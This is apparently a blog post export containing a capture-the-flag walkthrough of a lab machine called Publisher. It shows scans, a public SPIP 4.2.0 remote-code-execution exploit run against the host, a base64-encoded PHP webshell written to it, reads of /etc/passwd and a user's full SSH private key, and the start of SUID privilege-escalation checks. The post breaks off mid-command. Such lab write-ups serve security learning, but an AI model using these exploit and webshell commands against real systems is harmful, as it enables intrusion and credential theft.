{"id":750,"date":"2024-07-10T17:25:56","date_gmt":"2024-07-10T09:25:56","guid":{"rendered":"http:\/\/162.14.82.114\/?p=750"},"modified":"2024-07-10T17:25:56","modified_gmt":"2024-07-10T09:25:56","slug":"hmv-_-publisher","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/750\/07\/10\/2024\/","title":{"rendered":"hmv[-_-]Publisher"},"content":{"rendered":"<h1>Publisher<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724881.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724881.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710140036757\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724882.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724882.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710140611418\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.188:80\nOpen 192.168.0.188:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq\/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi\/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+\/gIThU4ODr\/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk\/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF\/gS3jP\/fVw+H6Eyz\/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL\/iO8JI5DrcvPDFlmqtX\/lzemir7W+WegC7hpoYpkPES6q+0\/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=\n|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG\/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Publisher&#039;s Pulse: SPIP Insights &amp; Tips\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer 
(@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.188\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.188\/images\/]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 8686]\n\/spip                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.188\/spip\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724884.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724884.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710140954527\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Sensitive Directory<\/h3>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.188\/spip\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724885.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724885.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710141506863\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>SPIP Vulnerability<\/h3>\n<p>It looks like a component, so try searching for vulnerabilities:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ whatweb http:\/\/$IP\/spip\nhttp:\/\/192.168.0.188\/spip [301 Moved Permanently] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.0.188], RedirectLocation[http:\/\/192.168.0.188\/spip\/], Title[301 Moved Permanently]\nhttp:\/\/192.168.0.188\/spip\/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.0.188], MetaGenerator[SPIP 4.2.0], SPIP[4.2.0][http:\/\/192.168.0.188\/spip\/local\/config.txt], Script[text\/javascript], Title[Publisher], 
UncommonHeaders[composed-by,link,x-spip-cache]<\/code><\/pre>\n<p>Found the SPIP version number; try searching for it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724886.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710141759767\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Downloaded it and tried to exploit, but it did not work; try searching GitHub for a related PoC:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724887.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724887.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710142048719\" style=\"zoom: 33%;\" 
\/><\/div><\/p>\n<p>The top and bottom two turn out to be the same; try running it to see whether commands can be executed:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ python3 51536.py -u http:\/\/$IP\/spip -c &#039;echo 1 &gt; test&#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/test\n1<\/code><\/pre>\n<p>Uploaded a reverse shell directly, but it would not connect back; try encoding a webshell and writing it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ python3 51536.py -u http:\/\/$IP\/spip -c &#039;echo &quot;PD89YCRfR0VUWzBdYD8+&quot; | base64 -d &gt; webshell.php&#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php                                                                                  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=whoami\nwww-data<\/code><\/pre>\n<p>Tried several reverse shell payloads, such as php, python, bash and netcat, but none worked; try looking through the relevant files:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=ls+-la\ntotal 164\ndrwxr-xr-x 11 www-data www-data  4096 Jul 10 06:40 .\ndrwxr-x---  5 www-data www-data  4096 Dec 20  2023 ..\n-rwxr-xr-x  1 www-data www-data  7045 Dec 20  2023 CHANGELOG.md\ndrwxr-xr-x  3 www-data www-data  4096 Dec 20  2023 IMG\n-rwxr-xr-x  1 www-data www-data 35147 Dec 20  2023 LICENSE\n-rwxr-xr-x  1 www-data www-data   842 Dec 20  2023 README.md\n-rwxr-xr-x  1 
www-data www-data   178 Dec 20  2023 SECURITY.md\n-rwxr-xr-x  1 www-data www-data  1761 Dec 20  2023 composer.json\n-rwxr-xr-x  1 www-data www-data 27346 Dec 20  2023 composer.lock\ndrwxr-xr-x  3 www-data www-data  4096 Dec 20  2023 config\ndrwxr-xr-x 22 www-data www-data  4096 Dec 20  2023 ecrire\n-rwxr-xr-x  1 www-data www-data  4307 Dec 20  2023 htaccess.txt\n-rwxr-xr-x  1 www-data www-data    42 Dec 20  2023 index.php\ndrwxr-xr-x  5 www-data www-data  4096 Dec 20  2023 local\ndrwxr-xr-x 22 www-data www-data  4096 Dec 20  2023 plugins-dist\n-rwxr-xr-x  1 www-data www-data  3645 Dec 20  2023 plugins-dist.json\ndrwxr-xr-x 12 www-data www-data  4096 Dec 20  2023 prive\n-rwxr-xr-x  1 www-data www-data   973 Dec 20  2023 spip.php\n-rwxr-xr-x  1 www-data www-data  1212 Dec 20  2023 spip.png\n-rwxr-xr-x  1 www-data www-data  1673 Dec 20  2023 spip.svg\ndrwxr-xr-x 10 www-data www-data  4096 Dec 20  2023 squelettes-dist\n-rw-rw-rw-  1 www-data www-data    22 Jul 10 06:30 test\ndrwxr-xr-x  6 www-data www-data  4096 Jul 10 06:16 tmp\ndrwxr-xr-x  6 www-data www-data  4096 Dec 20  2023 vendor\n-rw-rw-rw-  1 www-data www-data    15 Jul 10 06:40 webshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl 
http:\/\/$IP\/spip\/webshell.php?0=cat+\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nthink:x:1000:1000::\/home\/think:\/bin\/sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=cat+\/home\/think\/user.txt\nfa229046d44eda6a3598c73ad96f4ca5  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=cat+\/home\/think\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxPvc9pijpUJA4olyvkW0ryYASBpdmBasOEls6ORw7FMgjPW86tDK\nuIXyZneBIUarJiZh8VzFqmKRYcioDwlJzq+9\/2ipQHTVzNjxxg18wWvF0WnK2lI5TQ7QXc\nOY8+1CUVX67y4UXrKASf8l7lPKIED24bXjkDBkVrCMHwScQbg\/nIIFxyi262JoJTjh9Jgx\nSBjaDOELBBxydv78YMN9dyafImAXYX96H5k+8vC8\/I3bkwiCnhuKKJ11TV4b8lMsbrgqbY\nRYfbCJapB27zJ24a1aR5Un+Ec2XV2fawhmftS05b10M0QAnDEu7SGXG9mF\/hLJyheRe8lv\n+rk5EkZNgh14YpXG\/E9yIbxB9Rf5k0ekxodZjVV06iqIHBomcQrKotV5nXBRPgVeH71JgV\nQFkNQyqVM4wf6oODSqQsuIvnkB5l9e095sJDwz1pj\/aTL3Z6Z28KgPKCjOELvkAPcncuMQ\nTu+z6QVUr0cCjgSRhw4Gy\/bfJ4lLyX\/bciL5QoydAAAFiD95i1o\/eYtaAAAAB3NzaC1yc2\nEAAAGBAMT73PaYo6VCQOKJcr5FtK8mAEgaXZgWrDhJbOjkcOxTIIz1vOrQyriF8mZ3gSFG\nqyYmYfFcxapikWHIqA8JSc6vvf9oqUB01czY8cYNfMFrxdFpytpSOU0O0F3DmPPtQlFV+u\n8uFF6ygEn\/Je5TyiBA9uG145AwZFawjB8EnEG4P5yCBccotutiaCU44fSYMUgY2gzhCwQc\ncnb+\/GDDfXcmnyJgF2F\/eh+ZPvLwvPyN25MIgp4biiiddU1eG\/JTLG64Km2EWH2wiWqQdu\n8yduGtWkeVJ\/hHNl1dn2sIZn7UtOW9dDNEAJwxLu0hlxvZhf4SycoXkXvJb\/q5ORJGTYId\neGKVxvxPciG8QfUX+ZNHpMaHWY1VdOoqiBwaJnEKyqLVeZ1wUT4FXh+9SYFUBZDUMqlTOM\nH+qDg0qkLLiL55AeZfXtPebCQ8M9aY\/2ky92emdvCoDygozhC75AD3J3LjEE7vs+kFVK9H\nAo4EkYcOBsv23yeJS8l\/23Ii+UKMnQAAAAMBAAEAAAGBAIIasGkXjA6c4eo+SlEuDRcaDF\nmTQHoxj3Jl3M8+Au+0P+2aaTrWyO5zWhUfnWRzHpvGAi6+zbep\/sgNFiNIST2AigdmA1QV\nVxlDuPzM77d5DWExdNAaOsqQnEMx65ZBAOpj1aegUcfyMhWttknhgcEn52hREIqty7gOR5\n49F0+4+BrRLivK0nZJuuvK1EMPOo2aDHsxMGt4tomuBNeMhxPpqHW17ftxjSHNv+wJ4WkV\n8Q7+MfdnzSriRRXisKavE6MPzYHJtMEuDUJDUtIpXVx2rl\/L3DBs1GGES1Qq5vWwNGOkLR\nzz2F+3dNNzK6d0e18ciUXF0qZxFzF+hqwxi6jCASFg6A0YjcozKl1WdkUtqqw+Mf15q+KW\nxlkL1XnW4\/jPt3tb4A9UsW\/ayOLCGrlvMwlonGq+s+0nswZNAIDvKKIzzbqvBKZMfVZl4Q\nUafNbJoLlXm+4lshdBSRVHPe81IYS8C+1foyX+f1HRkodpkGE0\/4\/StcGv4XiRBFG1qQAA\nAMEAsFmX8iE4UuNEmz467uDcvLP53P9E2nwjYf65U4ArSijnPY0GRIu8ZQkyxKb4V5569l\nDbOLhbfRF\/KTRO7nWKqo4UUoYvlRg4MuCwiNsOTWbcNqkPWllD0dGO7IbDJ1uCJqNjV+OE\n56P0Z\/HAQfZovFlzgC4xwwW8Mm698H\/wss8Lt9wsZq4hMFxmZCdOuZOlYlMsGJgtekVDGL\nIHjNxGd46wo37cKT9jb2
7OsONG7BIq7iTee5T59xupekynvIqbAAAAwQDnTuHO27B1PRiV\nThENf8Iz+Y8LFcKLjnDwBdFkyE9kqNRT71xyZK8t5O2Ec0vCRiLeZU\/DTAFPiR+B6WPfUb\nkFX8AXaUXpJmUlTLl6on7mCpNnjjsRKJDUtFm0H6MOGD\/YgYE4ZvruoHCmQaeNMpc3YSrG\nvKrFIed5LNAJ3kLWk8SbzZxsuERbybIKGJa8Z9lYWtpPiHCsl1wqrFiB9ikfMa2DoWTuBh\n+Xk2NGp6e98Bjtf7qtBn\/0rBfdZjveM1MAAADBANoC+jBOLbAHk2rKEvTY1Msbc8Nf2aXe\nv0M04fPPBE22VsJGK1Wbi786Z0QVhnbNe6JnlLigk50DEc1WrKvHvWND0WuthNYTThiwFr\nLsHpJjf7fAUXSGQfCc0Z06gFMtmhwZUuYEH9JjZbG2oLnn47BdOnumAOE\/mRxDelSOv5J5\nM8X1rGlGEnXqGuw917aaHPPBnSfquimQkXZ55yyI9uhtc6BrRanGRlEYPOCR18Ppcr5d96\nHx4+A+YKJ0iNuyTwAAAA90aGlua0BwdWJsaXNoZXIBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Try connecting with the private key:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724888.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724888.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710145347622\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">think@publisher:~$ ls -la\ntotal 48\ndrwxr-xr-x 8 think    think    4096 Feb 10 21:27 .\ndrwxr-xr-x 3 root     root     4096 Nov 13  2023 ..\nlrwxrwxrwx 1 root     root        9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 think    think     220 Nov 14  2023 .bash_logout\n-rw-r--r-- 1 think    think    3771 Nov 14  2023 .bashrc\ndrwx------ 2 think    think    4096 Nov 14  2023 
.cache\ndrwx------ 3 think    think    4096 Dec  8  2023 .config\ndrwx------ 3 think    think    4096 Feb 10 21:22 .gnupg\ndrwxrwxr-x 3 think    think    4096 Jan 10 12:46 .local\n-rw-r--r-- 1 think    think     807 Nov 14  2023 .profile\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .python_history -&gt; \/dev\/null\ndrwxr-x--- 5 www-data www-data 4096 Dec 20  2023 spip\ndrwxr-xr-x 2 think    think    4096 Jan 10 12:54 .ssh\n-rw-r--r-- 1 root     root       35 Feb 10 21:20 user.txt\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .viminfo -&gt; \/dev\/null\nthink@publisher:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/sbin\/pppd\n\/usr\/sbin\/run_container\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\nthink@publisher:~$ ls -la \/usr\/sbin\/run_container\n-rwsr-sr-x 1 root root 16760 Nov 14  2023 \/usr\/sbin\/run_container\nthink@publisher:~$ ls -la \/usr\/bin\/fusermount\n-rwsr-xr-x 1 root root 39144 Mar  7  2020 \/usr\/bin\/fusermount\nthink@publisher:~$ echo &#039;whoami&#039; | at now\nwarning: commands will be executed using \/bin\/sh\njob 1 at Wed Jul 10 06:59:00 2024<\/code><\/pre>\n<h3>Analyzing the Program<\/h3>\n<p>Found a <code>suid<\/code> file; take a look at what it is:<\/p>\n<pre><code class=\"language-bash\">think@publisher:~$ strings 
\/usr\/sbin\/run_container\n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\n__stack_chk_fail\nexecve\n__cxa_finalize\n__libc_start_main\nGLIBC_2.2.5\nGLIBC_2.4\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nu+UH\n[]A\\A]A^A_\n\/bin\/bash\n\/opt\/run_container.sh\n:*3$&quot;\nGCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.8061\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nrun_container.c\n__FRAME_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\n_ITM_deregisterTMCloneTable\n_edata\n__stack_chk_fail@@GLIBC_2.4\n__libc_start_main@@GLIBC_2.2.5\nexecve@@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_csu_init\n__bss_start\nmain\n__TMC_END__\n_ITM_registerTMCloneTable\n__cxa_finalize@@GLIBC_2.2.5\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.plt.sec\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.data\n.bss\n.comment<\/code><\/pre>\n<p>It contains the sensitive strings <code>\/bin\/bash<\/code> and <code>\/opt\/run_container.sh<\/code>, which are probably what gets executed!<\/p>\n<pre><code class=\"language-bash\">think@publisher:~$ ls -la \/opt\/run_container.sh\n-rwxrwxrwx 1 root root 1715 Mar 29 13:25 \/opt\/run_container.sh\nthink@publisher:~$ cat \/opt\/run_container.sh\ncat: \/opt\/run_container.sh: Permission denied\nthink@publisher:~$ ls -la \/opt\nls: cannot open directory &#039;\/opt&#039;: Permission denied\nthink@publisher:~$ getfacl 